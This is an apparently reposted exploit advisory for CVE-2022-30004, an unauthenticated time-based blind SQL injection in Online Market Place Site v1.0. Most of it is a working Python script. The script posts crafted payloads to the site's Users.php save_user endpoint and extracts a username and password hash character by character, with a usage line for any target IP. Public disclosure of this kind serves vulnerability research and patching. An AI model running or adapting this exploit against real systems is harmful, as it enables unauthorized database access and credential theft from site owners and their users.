Authored by Joe Pollock

Online Market Place Site version 1.0 suffers from an unauthenticated blind SQL injection vulnerability allowing remote attackers to dump the SQL database via time-based SQL injection.

advisories | CVE-2022-30004

# Exploit Title: Online Market Place Site v1.0 - Unauthenticated Blind Time-Based SQL Injection
# Exploit Author: Joe Pollock
# Date: September 03, 2022
# Vendor Homepage: https://www.sourcecodester.com/php/15273/online-market-place-site-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/omps.zip
# Tested on: Kali Linux, Apache, Mysql
# CVE: CVE-2022-30004 (RESERVED)
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
#   Online Market Place Site v1.0 suffers from an unauthenticated blind SQL Injection Vulnerability allowing remote attackers to dump the SQL database via time-based SQL injection.
#   This script will retrieve a single username and associciated password hash from the omps_db database via blind, time-based SQL injection.
#   By default, the username & hash retrieved will have an ID equal to zero in the database, i.e. the first username and password hash.
#   Default behavior can be changed by setting the USERID variable. Sleep timings may also have to be adjusted to account for network latency.
#   Ex: python3 omps.py 10.14.14.2
import sys, requests, urllib3
USERID=0

def main():
  if len(sys.argv) != 2:
    print("(+) usage: %s <target>")  % sys.argv[0]
    print('(+) eg: %s 192.168.121.103')  % sys.argv[0]
    sys.exit(-1)
  ip = sys.argv[1]
  print("(+) Retrieving username and hash...")
  target = "http://%s/omps/classes/Users.php?f=save_user" % ip

  # Get username
  for p in range (1,30):
    injection_string = "AAAA' OR IF(ascii(MID((select username from omps_db.users LIMIT %d,1),%d,1))=[CHAR],sleep(1),0)-- -" % (USERID,p)
    for c in range(32, 126):
      files = {"username": (None, injection_string.replace("[CHAR]", str(c)))}
      #print(injection_string.replace("[CHAR]", str(c)))
      r = requests.post(target, files=files)
      if (r.elapsed.total_seconds() > 2):
        extracted_char = chr(c)
        sys.stdout.write(extracted_char)
        sys.stdout.flush()
  sys.stdout.write("t")

  # Get password hash
  for p in range (1,65):
    injection_string = "AAAA' OR IF(ascii(MID((select password from omps_db.users LIMIT %d,1),%d,1))=[CHAR],sleep(1),0)-- -" % (USERID,p)
    for c in range(32, 126):
      files = {"username": (None, injection_string.replace("[CHAR]", str(c)))}
      #print(injection_string.replace("[CHAR]", str(c)))
      r = requests.post(target, files=files)
      if (r.elapsed.total_seconds() > 2):
        extracted_char = chr(c)
        sys.stdout.write(extracted_char)
        sys.stdout.flush()
  print("n(+) done!")

if __name__ == "__main__":
  main()

RELATED ARTICLESMORE FROM AUTHOR